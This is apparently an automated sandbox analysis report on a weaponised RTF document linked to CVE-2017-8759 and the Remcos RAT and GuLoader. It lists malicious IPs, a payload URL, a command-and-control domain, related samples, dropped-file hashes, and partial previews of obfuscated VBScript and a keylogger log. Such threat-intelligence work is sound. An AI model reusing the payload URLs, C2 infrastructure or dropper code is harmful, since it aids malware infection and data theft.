• SATIN ALMA EMR#U0130.xls | malicious | Remcos | 198.46.176.133/Upload/vbs.jpeg
• Purchase order.xls | malicious | Remcos | 198.46.176.133/Upload/vbs.jpeg
• createdthingstobefrankwithmeeverywhere.gIF.vbs | malicious | GuLoader, Remcos | 198.46.176.133/Upload/vbs.jpeg
• createactiveimagesbeautygirlfrnd.gIF.vbs | malicious | Remcos | 198.46.176.133/Upload/vbs.jpeg
• screensimplethingstohandlecream.gIF.vbs | malicious | Remcos | 198.46.176.133/Upload/vbs.jpeg
• creatednewwaterbottleforme.gIF.vbs | malicious | Unknown | 198.46.176.133/Upload/vbs.jpeg
• IFqsFpijFt.rtf | malicious | Remcos | 198.46.176.133/Upload/vbs.jpeg
• girlfrnd.doc | malicious | GuLoader, Remcos | 198.46.176.133/Upload/vbs.jpeg
103.253.17.222
• PI-002312.xls | malicious | Remcos
• Purchase Order.exe | malicious | GuLoader, Remcos
• JPEG00774533.vbs | malicious | Remcos, GuLoader
• CamScanner0091.vbs | malicious | Remcos, GuLoader
• PI00232.vbs | malicious | Remcos, GuLoader
178.237.33.50
• 17222595947848c557577cb7231356008886f5096f576098b0877ccefa60e0124d9938bde0501.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
• NySTAwCpzK.rtf | malicious | Remcos | geoplugin.net/json.gp
• PI-002312.xls | malicious | Remcos | geoplugin.net/json.gp
• SATIN ALMA EMR#U0130.xls | malicious | Remcos | geoplugin.net/json.gp
• Purchase order.xls | malicious | Remcos | geoplugin.net/json.gp
• 17222151664c1cf157f4e60a5db7bff76e80474d27d5be3b770f3ff1dd50ca91ddde2e4170122.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
• SKqrekfUiW.exe | malicious | Remcos | geoplugin.net/json.gp
• createdthingstobefrankwithmeeverywhere.gIF.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
• createactiveimagesbeautygirlfrnd.gIF.vbs | malicious | Remcos | geoplugin.net/json.gp
• screensimplethingstohandlecream.gIF.vbs | malicious | Remcos | geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
tochisglobal.ddns.net
• PI-002312.xls | malicious | Remcos | 103.253.17.222
• Purchase Order.exe | malicious | GuLoader, Remcos | 103.253.17.222
• JPEG00774533.vbs | malicious | Remcos, GuLoader | 103.253.17.222
• CamScanner0091.vbs | malicious | Remcos, GuLoader | 103.253.17.222
• PI00232.vbs | malicious | Remcos, GuLoader | 103.253.17.222
geoplugin.net
• 17222595947848c557577cb7231356008886f5096f576098b0877ccefa60e0124d9938bde0501.dat-decoded.exe | malicious | Remcos | 178.237.33.50
• NySTAwCpzK.rtf | malicious | Remcos | 178.237.33.50
• PI-002312.xls | malicious | Remcos | 178.237.33.50
• SATIN ALMA EMR#U0130.xls | malicious | Remcos | 178.237.33.50
• Purchase order.xls | malicious | Remcos | 178.237.33.50
• 17222151664c1cf157f4e60a5db7bff76e80474d27d5be3b770f3ff1dd50ca91ddde2e4170122.dat-decoded.exe | malicious | Remcos | 178.237.33.50
• SKqrekfUiW.exe | malicious | Remcos | 178.237.33.50
• createdthingstobefrankwithmeeverywhere.gIF.vbs | malicious | GuLoader, Remcos | 178.237.33.50
• createactiveimagesbeautygirlfrnd.gIF.vbs | malicious | Remcos | 178.237.33.50
• screensimplethingstohandlecream.gIF.vbs | malicious | Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS
• RFQ_418430000056120000580.exe | malicious | Unknown | 107.175.229.136
• NySTAwCpzK.rtf | malicious | Remcos | 198.46.176.133
• RFQ_418430000056120000580.exe | malicious | Unknown | 107.175.229.136
• PI-002312.xls | malicious | Remcos | 172.245.123.11
• SATIN ALMA EMR#U0130.xls | malicious | Remcos | 198.46.176.133
• Purchase order.xls | malicious | Remcos | 198.46.176.133
• file.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader | 107.173.160.137
• loveyou.exe | malicious | CobaltStrike, Metasploit | 23.94.247.40
• file.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader | 107.173.160.137
• xSYFgHIHTv.rtf | malicious | Unknown | 198.46.178.229
WIFIKU-AS-IDPTWifikuIndonesiaID
• PI-002312.xls | malicious | Remcos | 103.253.17.222
• Purchase Order.exe | malicious | GuLoader, Remcos | 103.253.17.222
• JPEG00774533.vbs | malicious | Remcos, GuLoader | 103.253.17.222
• CamScanner0091.vbs | malicious | Remcos, GuLoader | 103.253.17.222
• PI00232.vbs | malicious | Remcos, GuLoader | 103.253.17.222
• Spare_part_list.xls | malicious | Lokibot | 103.253.17.249
• 57m#U00b3_LPG_SEMI_TRAILER_7_NOS.pdf.xls | malicious | AgentTesla | 103.253.17.249
• EUCjx7V4L9.elf | malicious | Gafgyt, Mirai | 116.0.5.90
ATOM86-ASATOM86NL
• 17222595947848c557577cb7231356008886f5096f576098b0877ccefa60e0124d9938bde0501.dat-decoded.exe | malicious | Remcos | 178.237.33.50
• NySTAwCpzK.rtf | malicious | Remcos | 178.237.33.50
• PI-002312.xls | malicious | Remcos | 178.237.33.50
• SATIN ALMA EMR#U0130.xls | malicious | Remcos | 178.237.33.50
• Purchase order.xls | malicious | Remcos | 178.237.33.50
• 17222151664c1cf157f4e60a5db7bff76e80474d27d5be3b770f3ff1dd50ca91ddde2e4170122.dat-decoded.exe | malicious | Remcos | 178.237.33.50
• SKqrekfUiW.exe | malicious | Remcos | 178.237.33.50
• createdthingstobefrankwithmeeverywhere.gIF.vbs | malicious | GuLoader, Remcos | 178.237.33.50
• createactiveimagesbeautygirlfrnd.gIF.vbs | malicious | Remcos | 178.237.33.50
• screensimplethingstohandlecream.gIF.vbs | malicious | Remcos | 178.237.33.50
                              No context
                              No context
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):512
                              Entropy (8bit):3.5077736656901792
                              Encrypted:false
                              SSDEEP:12:6lVsL8ec0WQ7yp50AtN25MMy4tN25MMyHW+:6/sFc0WaE50At/My4t/MyHW+
                              MD5:3E51DFA6C580AA40C357208CE839F992
                              SHA1:A5B0D629BF23F371A2917250A413361189E5E448
                              SHA-256:FBA6E48805BDC07F5D9722D15B931771459396C446F733CA7E1F57F7BEE7FDA6
                              SHA-512:FE2A430883C85D5FAE5C1BEA3BE53D9BA36A81E34EA361473D91347F4BCB66A7F5367930689A5C43568FB725F4515DAC96F0C2CDD4A7E5FBAD90AC0ACF6A9939
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                              Reputation:low
                              Preview:....[.2.0.2.4./.0.7./.2.9. .1.0.:.1.5.:.1.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.4.v.z.w.J.T.Z.b.w.T. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4760
                              Entropy (8bit):4.834060479684549
                              Encrypted:false
                              SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                              MD5:838C1F472806CF4BA2A9EC49C27C2847
                              SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                              SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                              SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):0.34726597513537405
                              Encrypted:false
                              SSDEEP:3:Nlll:Nll
                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:@...e...........................................................
                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):414990
                              Entropy (8bit):3.5776427335218326
                              Encrypted:false
                              SSDEEP:3072:sHGowfvYF7hNe4VTdRnTT8w4TWIdqruoJTgCOpBKEMDS7opi70cmt07CjeJIvv:OwfvYFqdqR
                              MD5:C7F6CF5DA3192C2CAE7D911EE67F6620
                              SHA1:9502C8B3D6FAAFC64C45C7731CA9528DB6B7ED76
                              SHA-256:8EC7A5B08CAF43325E9C75D3E9397418ABE644CFC39185F5BC0AC5A9E954F858
                              SHA-512:CFBA63F83B3667C80E7615C676CF858B7B816E9202B4C2F6FCBD86A9D54BB29E959B6B4E791C9ADF00B43A278ECCE8D4824F214224DE15708D3DE5D4F5E7130A
                              Malicious:false
                              Reputation:low
                              Preview:..d.i.m. .i.l.l.a.c.e.r.a.d.o.E.E. .....i.l.l.a.c.e.r.a.d.o.E. .=. .r.a.n.i.n.o.........a.n.a.d.a.r.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.1._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.2._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.3._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.4._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.6._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.7._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.8._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):962
                              Entropy (8bit):5.012309356796613
                              Encrypted:false
                              SSDEEP:12:tklu+mnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdbauKyGX85jvXhNlT3/7AcV9Wro
                              MD5:14B479958E659C5A4480548A393022AC
                              SHA1:CD0766C1DAB80656D469ABDB22917BE668622015
                              SHA-256:0F92BDD807D2F5C9947E1775A20231233043C171F62E1AFA705A7E7938909BFE
                              SHA-512:4E87CA47392DD9710F9E3D4A2124A34B41938986A4F43D50A48623DB1838C0D6CFF05FD2A23792DCD5A974A94416C97DC04ECEF85025FC785F3393B69A0B1DC5
                              Malicious:false
                              Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):8192
                              Entropy (8bit):4.940690864758113
                              Encrypted:false
                              SSDEEP:96:JNmMPo5fQEMVjnLPHoYTgp7gU45fQmMVjnLPHoYTgp:JVP8QB5/oMOfsQf5/oMO
                              MD5:57704A7FC1448F3AB2FF3474F0AF9E63
                              SHA1:584DBA008ABDCF8B6FD2AB6E8128C3ECE8F86E4A
                              SHA-256:F339F96133748771CDD2F7F6FC88DD0E3765E717D9693DFB8C38972BE39B6CF2
                              SHA-512:FCF78B23B072AF848A8B0D013D2F39FB377956E75A80FB431E37B6F49B3D95F8CE61A8DDD2BD2FAE598D6F1F98B7E1EEB53054DBF95F675C12C89F55FD356EA8
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):6144
                              Entropy (8bit):3.4306375443017565
                              Encrypted:false
                              SSDEEP:96:kzuywIuEfNVI/zjpKSp30DDcohcqrew1F9+QQ+b8s4edtQ4gljlCAxYoHCCwCQuA:kJ/uEvyXZKDD1ZrFF9vn8srXglj1xYoK
                              MD5:7B77A13E831BF00230835CD08F51405A
                              SHA1:41AC03C0F84255A4EDEEF4EFCC94820E5824FE7D
                              SHA-256:D1D8CDBF8F64D2AF7FCF37F8C7CAB307187C331251D6221851E8C0AEA138393B
                              SHA-512:12005CDA9EE724B0DFBD53A90B9042C6707CD55927C58456FE99D0E9F172175CB5AAAB44D1339234295FB2BF54A52D08D9F12F83B9AA091C89808B4A6E0D900F
                              Malicious:false
                              Preview:............1.9.4.9.1.3.3.4...(.?.-.*.4.|.].:.4.8.1.6.2.>.!...$.?.~...*.0.(.8.8.;.~.?.<.$.`.^.$.;...+./.0.*...2.1.~._.*.>.`.@._.&.6.?.%.|.:.*.'.3.4.*.,.7.|./.^.,.4.?.+.%.?.=.<.0...`.0.9.2.4.~.&.?.1...5.:.*.?...0.2.$.0.-.?...5.%.<.*.).[.9.|.@.<.?.;.?.<._.;.7.2.?.(.'.?.;.0.?.5.+.`.3.$.`.>.!.7.?.7.|.6.(.?.[.1...3.~.?...2.:.>.>.%.;.$.,.(.).9.-.`.=.5.~.9.#.0.;.`./.-.:.3...;.~.`.+.1.,.0...%.3.5.%.^.].%.<...^.;.5.9.!.4.5.].8./...'.[.-.%.(...]./.>.?.6.3.].?.+.'.!.<.^.>.?.(.&.#.|.?.[.'.,.0.3.?.'.|.;.0.7...+.,.4.-.^.+.'.?.9...?.1.<...*.?.7.?.#.=._.+...~.?./.....;./.0...[.?.?.?.[./...3...=.1.~...#.:.9.~.?.?.:.+.<.0.#.7...'.>.:.~...5.!.5.-.'.^.)./.'.?.2.>.0.?...'.,.<.?.=..._.!.8.5.9./...~.&.?.&.?.0.5...;.-.&.<.=.%.|...!.;.9.@.4.=.?.?.~.6././...6.?.).=.+.!.3.?.;.'.%.....;.,.6._.'.?.=.~.<.2.!.6.?.%.<.~.>.@.).'.7.@.%._.^.'.!.@.*.(.?.7.#.).).6.[.+.].@.?.%.`.>.`...#.~.8...5.?.+.7.?.~.7.&.%.+.8.$.(.).|.1.8.?.&.=.=.?.$.?.6...&.#...?.[.3.~.&.?.7.0.1.6.>.$.?.@.#...?.]...~.?.#.4.,.8.<._.6.?.<...].%._.4.7.%.
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):1024
                              Entropy (8bit):0.05390218305374581
                              Encrypted:false
                              SSDEEP:3:ol3lYdn:4Wn
                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                              Malicious:false
                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview:1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview:1
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Mon Jul 29 13:14:59 2024, length=80092, window=hide
                              Category:dropped
                              Size (bytes):1014
                              Entropy (8bit):4.5770780502304875
                              Encrypted:false
                              SSDEEP:12:82nFgXg/XAlCPCHaXAyB6B/5YXX+WN1UquoNIeicvb483AY04sODtZ3YilMMEpxK:8u/XTwyA4Xjsne7DfDv3qBk7N
                              MD5:247D9BA9DC8A4DF1641E0AA686C04C19
                              SHA1:965EF12A2519503E2357CD12381045A72B56B7D4
                              SHA-256:EDB6A3A0A334F769D93AC7E303B25F022C9CCBAADA747B1C32D80C93B7703499
                              SHA-512:2A87697441A6BB0EA539F613D278AB379819CE7650DC3185280FAA05AEA5D2022685A83D954F627D8514B67BD1EBFF227E05389CA7B5FC1F0536141374AC3641
                              Malicious:false
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:Generic INItialization configuration [folders]
                              Category:dropped
                              Size (bytes):55
                              Entropy (8bit):4.654086986251931
                              Encrypted:false
                              SSDEEP:3:HYEQLp6lm46QLp6lv:HZQd1QdI
                              MD5:FC579A0462679AE27CD32010872218C9
                              SHA1:C52A9A2AEB15F1D027F8A26E31B878DC7736EF07
                              SHA-256:B6CC1892EE65BF5DD4B553F99660DA11B7B06758BAC8B5205125C8915300E534
                              SHA-512:62591D7DB0B29584670F8B0C9645DDAFFF0053C39CD17B082A03F9AD6EF9E82B104C349B16A5C6BD894D39C6DB3B9DF32B4BD5DD12B2EA62306927531BDE4997
                              Malicious:false
                              Preview:[misc]..4vzwJTZbwT.LNK=0..[folders]..4vzwJTZbwT.LNK=0..
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):162
                              Entropy (8bit):2.4797606462020307
                              Encrypted:false
                              SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                              MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                              SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                              SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                              SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                              Malicious:false
                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):414990
                              Entropy (8bit):3.5776427335218326
                              Encrypted:false
                              SSDEEP:3072:sHGowfvYF7hNe4VTdRnTT8w4TWIdqruoJTgCOpBKEMDS7opi70cmt07CjeJIvv:OwfvYFqdqR
                              MD5:C7F6CF5DA3192C2CAE7D911EE67F6620
                              SHA1:9502C8B3D6FAAFC64C45C7731CA9528DB6B7ED76
                              SHA-256:8EC7A5B08CAF43325E9C75D3E9397418ABE644CFC39185F5BC0AC5A9E954F858
                              SHA-512:CFBA63F83B3667C80E7615C676CF858B7B816E9202B4C2F6FCBD86A9D54BB29E959B6B4E791C9ADF00B43A278ECCE8D4824F214224DE15708D3DE5D4F5E7130A
                              Malicious:true
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                              Category:dropped
                              Size (bytes):41744
                              Entropy (8bit):5.189145922463506
                              Encrypted:false
                              SSDEEP:384:323tHbrN79ozVzEFH3W2j2xYuWXmddk9hZUPgRA5a5jkay95si6rGsNAYAXJqskN:323b3W2G3kGoRAk/y95AhAZqCO
                              MD5:E2C840CDB6F343D7067F7C9ABCBBC900
                              SHA1:D67DE2D3EEC584EA31AB5F4C41621108B4411151
                              SHA-256:04EDCBB532111FD4CBBE536774FC33CEAEB5C436B5F96D732A011F03B8729AF0
                              SHA-512:6C60906AC4716A99EDC721F3C60377BE92717B6256ADC877FEB872D33C33E816FABFB464FF8FDE305B8734F73CC06449190CC6CF9E3ACB6BA8CA67F24C2F149F
                              Malicious:true
                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):162
                              Entropy (8bit):2.4797606462020307
                              Encrypted:false
                              SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                              MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                              SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                              SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                              SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                              Malicious:false
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                              Category:dropped
                              Size (bytes):41744
                              Entropy (8bit):5.189145922463506
                              Encrypted:false
                              SSDEEP:384:323tHbrN79ozVzEFH3W2j2xYuWXmddk9hZUPgRA5a5jkay95si6rGsNAYAXJqskN:323b3W2G3kGoRAk/y95AhAZqCO
                              MD5:E2C840CDB6F343D7067F7C9ABCBBC900
                              SHA1:D67DE2D3EEC584EA31AB5F4C41621108B4411151
                              SHA-256:04EDCBB532111FD4CBBE536774FC33CEAEB5C436B5F96D732A011F03B8729AF0
                              SHA-512:6C60906AC4716A99EDC721F3C60377BE92717B6256ADC877FEB872D33C33E816FABFB464FF8FDE305B8734F73CC06449190CC6CF9E3ACB6BA8CA67F24C2F149F
                              Malicious:true
                              Yara Hits:
                              • Rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2, Description: detects CVE-2017-8759 weaponized RTF documents., Source: C:\Users\user\Desktop\~WRD0000.tmp, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              File type:Rich Text Format data, version 1
                              Entropy (8bit):2.4493102661720756
                              TrID:
                              • Rich Text Format (5005/1) 55.56%
                              • Rich Text Format (4004/1) 44.44%
                              File name:4vzwJTZbwT.rtf
                              File size:80'092 bytes
